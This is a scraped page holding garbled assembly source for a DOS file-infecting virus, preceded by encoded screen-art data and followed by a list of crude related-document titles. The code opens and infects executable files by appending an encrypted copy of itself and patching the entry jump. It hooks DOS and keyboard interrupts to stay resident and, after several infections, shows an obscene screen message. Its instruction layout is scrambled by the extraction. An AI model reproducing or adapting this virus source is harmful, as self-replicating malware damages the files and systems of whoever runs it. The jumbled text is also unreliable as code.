',0,' ',0,' ',0,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',96,' ',96,' ',96,' ',96,' ',103,' ',103 ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103 ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103 ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103 ' ',103,' ',103,'?',96,'?',96,'?',96,' ',96,'?',96,'?' 96,'?',96,'?',96,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,'?'
db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db
15,'?',15,'?',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',96,' ',96,' ',96 ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103 ' ',96,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103 ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103 ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,'?',96 '?',96,'?',96,'?',96,' ',96,'?',96,'?',96,'?',15,'?',15 '?',15,'?',15,'?',15,'?',15,' ',15,' ',15,' ',15,' ',15 '?',15,'?',15,'?',15,'?',15,'?',15,'?',15,'?',15,' ',15 ' ',0,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',96,' ',96,' ',96,' ',96,' ',103,' ',103,'?',96 '?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96 '?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96 '?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96 '?',96,'?',96,'?',96,'?',96,' ',96,'?',96,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,'?',15,'?',15,'?',15,' ',15,' ',15 ' ',0,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',96,' ',103,' ',103,' ',96,' ',96,' ',103,'?',96 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,'?',96,'?',96,'?',96,'?',96,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',103,' ',103,' ',103,'?',96,'?',96,'?',96,' ' 103,'?',96,' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',103,' ',103,'?',96,'?',96,'?',96,'?',96,' ',103 '?',96,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',103,'?',96,'?',96,'?',96,'?',96,' ',103,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
doggie
db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db
15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,'?',96,' ',103,' ',103,' ',103,'?',96,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 15,'y',15,'o',15,'u',15,'r',15,' ',15,'f',15,'i',15,'l',15,'e' 15,' ',15,'h',15,'a',15,'s',15,' ',15,'j',15,'u',15,'s',15,'t' 15,' ',15,'b',15,'e',15,' ',15,'p',15,'e',15,'n',15,'i',15,'s' 15,'`',15,'i',15,'z',15,'e',15,'d',15,' ',15,'c',15,'o',15,'m'
db db db db db db db db ;actual program
15,'p',15,'l',15,'e',15,'m',15,'e',15,'n',15,'t',15,'s',15,' ' 15,'o',15,'f',15,' ',15,' ',15,' ' 0,' ',0,' ',15,' ',15,' ',15,' ' 03,'[',03,'y',03,'a',03,'m' 03,']',03,'/',03,'9',03,'2' 03,' ',02,'-',04,'s',04,'.',04,'g',04,'r',04,'i',04,'s',04,'s' 04,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0 begins here
exec: push push push push push push push push
ax bx cx dx di si ds es
mov int jc
ax,4300h 21h long_cock
;get file attributes
and mov int jc
cl,0feh ax,4301h 21h long_cock
;make it read/write
mov int jc
ax,3d02h 21h long_cock
mov
bx,ax
push push pop
ds cs ds
mov mov mov int jc
ah,3fh cx,5h dx,(buffer-vstart) 21h long_cock
cmp je
word ptr cs:[(buffer-vstart)],5a4dh ;check to see if its an long_cock ;exe
cmp je
word ptr cs:[(buffer-vstart)+3],42f2h long_cock ;check to see if f242 tag ;if so then its infected next
infect:
jmp
;load in the first 5 bytes
long_cock: jmp
cocker2
next: mov int
ax,5700h 21h
mov mov
word ptr cs:[(old_time-vstart)],cx word ptr cs:[(old_date-vstart)],dx
mov xor xor int jc mov sub mov
ax,4202h ;move file pointer to end cx,cx ;top get the files size dx,dx 21h long_cock cx,ax cx,3 ;sub 3 form jump at begining word ptr cs:[(jump_add+1-vstart)],cx;save length in jmp commmand
mov mov call
cx,(old_21-old_8) ;number of bytes to encrypt before writing si,(old_8-vstart) crypter
mov mov call
cx,(exec-data) si,(data-vstart) crypter
mov mov push
ah,byte ptr cs:[(infect_times-vstart)] byte ptr cs:[(infect_times-vstart)],00h ax
mov mov xor int jc
cx,(vend-vstart) ah,40h dx,dx 21h cocker
pop inc mov
ax ah byte ptr cs:[(infect_times-vstart)],ah ;counter
mov mov call
cx,(exec-data) si,(data-vstart) crypter
mov mov call
cx,(old_21-old_8) ;number of bytes to decrypt after writing si,(old_8-vstart) crypter
mov xor
ax,4200h cx,cx
;get the files time ;and date
;write the virus to the end ;of the file
;decrypt data
;move file pointer to the ;begining to write the jmp
xor int
dx,dx 21h
mov mov mov int
cx,5 ah,40h dx,(jump_add-vstart) 21h
jc
cocker
mov mov mov
ax,5701h word ptr cx,cs:[(old_time-vstart)] word ptr dx,cs:[(old_date-vstart)]
;restore old time,date
and inc int
cl,0e0h cl 21h
;change seconds to 2
mov int
ah,3eh 21h
jmp cocker: jmp
;write the jmp top the file
show_dick cocker2
show_dick:
mono: doit:
counter
screen
cmp jl
byte ptr cs:[(infect_times-vstart)],03h cocker
mov int cmp jz mov jmp mov mov
ah,0fh 010h al,7 mono ax,0b800h short doit ax, 0b000h es,ax
push pop mov xor
cs ds si,data-vstart di,di
;load destination offset ;clear destination index
mov rep
cx,(exec-data+1)/2 movsw
;write to video memory
mov mov mov
ah,02h bh,0 dx,1a00h
;hide cursor ;assume video page 0 ;moves cursor past bottom of
int
010h
;get current video mode ;is it a monochrome mode? ;yes ;color text video segment ;monochrome text video segment
lup:
mov int jz mov int
ah, 01h 016h lup ah,0 016h
;clear the screen mov ah, 6 mov al, 0 mov bh, 7 mov ch, 0 mov cl, 0 mov dh, 25 mov dl, 80 int 10h mov mov mov int
cocker2:pop pop pop pop pop pop pop pop pop jmp
ah,02h bh,0 dx,0 010h
ds es ds si di dx cx bx ax
;function 6 (scroll window up) ;blank entire screen ;attribute to use ;starting row ;starting column ;ending row ;ending column ;call interrupt 10h ;puts cursor back where it belongs ;assume video page 0
;go back to old int 21
dword ptr cs:[(old_21-vstart)]
old_date dw old_time dw
0 0
buffer: db buffer2 db infect_times: jump_add: db
0cdh,20h,00 0,0 db 0h 0e9h,00,00,0f2h,42h;
;*********************************************************************** ;*********************************************************************** ;*********************************************************************** ;*********************************************************************** ;*********************************************************************** exit2: jmp crypter: push loo: mov xor mov inc
exit ax ah,byte ptr cs:[si] ah,0aah byte ptr cs:[si],ah si
;encryptor routine ;move byte into ah ;xor it ;write it back
loop pop ret load:
loo ax
mov int cmp je
ax,0f242h 21h bx,0242fh exit2
; check to see if we are ; allready resident ; looking for f242 tag
mov mov add call
cx,(old_21-old_9) si,offset old_9 si,bp crypter
;number of bytes to decrypt
mov mov add call
cx,(exec-data) si,offset data si,bp crypter
;number of bytes to decrypt
dec_here: push pop
cs ds
mov int
ah,49h 21h
;release current memory block
mov mov int
ah,48h bx,0ffffh 21h
;request hugh size of memory ;returns biggest size
mov sub jc int
ah,4ah bx,(vend-vstart+15)/16+1 exit2 21h
mov mov int jc
ah,48h bx,(vend-vstart+15)/16 21h exit2
dec
ax
push
es
mov
es,ax
mov mov mov sub
byte word word word
inc
ax
ptr ptr ptr ptr
;subtract virus size
;request last xxx pages ;allocate it to virus
es:[0],'z' ;make dos the owner es:[1],8 es:[3],(vend-vstart+15)/16 ;put size here es:[12h],(vend-vstart+15)/16 ;sub size from current ;memory
lea xor mov mov cld rep
si,[bp+offset vstart] di,di es,ax cx,(vend-vstart+5)/2
;copy it to new memory block
xor mov push lds mov mov pop mov mov
ax,ax ds,ax ds ax,ds:[21h*4] word ptr es:[old_21-vstart],ax word ptr es:[old_21-vstart+2],ds ds word ptr ds:[21h*4],(new_21-vstart) ds:[21h*4+2],es
xor mov push lds mov mov pop mov mov
ax,ax ds,ax ds ax,ds:[9h*4] word ptr es:[old_9-vstart],ax word ptr es:[old_9-vstart+2],ds ds word ptr ds:[9h*4],(new_9-vstart) ds:[9h*4+2],es
xor mov push lds mov mov pop mov mov
ax,ax ds,ax ds ax,ds:[8h*4] word ptr es:[old_8-vstart],ax word ptr es:[old_8-vstart+2],ds ds word ptr ds:[8h*4],(new_8-vstart) ds:[8h*4+2],es
push pop
cs ds
push pop
cs es
movsw
exit:
; now got to copy it back......
;swap vectors manually
vend
mov mov add mov repne
cx,5 si,offset buffer si,bp di,100h movsb
mov jmp
bp,100h bp
equ
$
seg_a end
ends start
;copy it back and run original ;program
Related Documents
Penis
November 2019 18
Ca Penis
April 2020 13
Fracture Of The Penis
April 2020 11
Aumente Seu Penis
October 2019 16
To Get Penis Of Steel
April 2020 10